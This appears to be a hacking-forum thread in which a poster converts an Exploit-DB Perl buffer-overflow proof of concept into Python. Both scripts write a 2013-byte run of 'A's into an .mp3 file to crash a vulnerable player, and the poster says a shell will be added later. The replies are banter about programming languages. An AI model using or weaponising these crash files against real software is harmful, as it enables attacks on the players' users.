Login Register






Perl Buffer Overflow Exploit Converted to Python filter_list
Author
Message
Perl Buffer Overflow Exploit Converted to Python #1
Code:
#!/usr/bin/perl $bof = "A" x 2013; $filename = "bof.mp3"; open (FILE,">$filename"); print FILE "$bof"; print "\ncreated!!!\n";
http://www.exploit-db.com/exploits/28561/

Code:
#!/usr/bin/python buffer = "\x41" * 2013 textfile = open("overflow.mp3" , 'w') textfile.write(buffer) textfile.close()

I'll code a shell into it later.

Reply

RE: Perl Buffer Overflow Exploit Converted to Python #2
ok that's really cool and all but perl > python

Reply

Perl Buffer Overflow Exploit Converted to Python #3
Well Im better at python so I will use it.
#MakeSinisterlySexyAgain

Reply

RE: Perl Buffer Overflow Exploit Converted to Python #4
bumper uberflaps r l33test specially when we dunno wat is 4
PGP
Sign: F202 79C9 76F7 40BB 54EC 494F 5DEF 1D70 14C1 C4CC
Encrypt: A5B3 1B21 55E1 80AF 4C6E DE83 467B 8EFC 3DEE 681C
Auth: CD55 E8A5 1A08 2933 8BA6 BC88 D81F 1943 739A 3C47

Reply

RE: Perl Buffer Overflow Exploit Converted to Python #5
(10-02-2013, 09:02 PM)Starfall Wrote: bumper uberflaps r l33test specially when we dunno wat is 4
I'll pretend I understand what I just read O_o.

Reply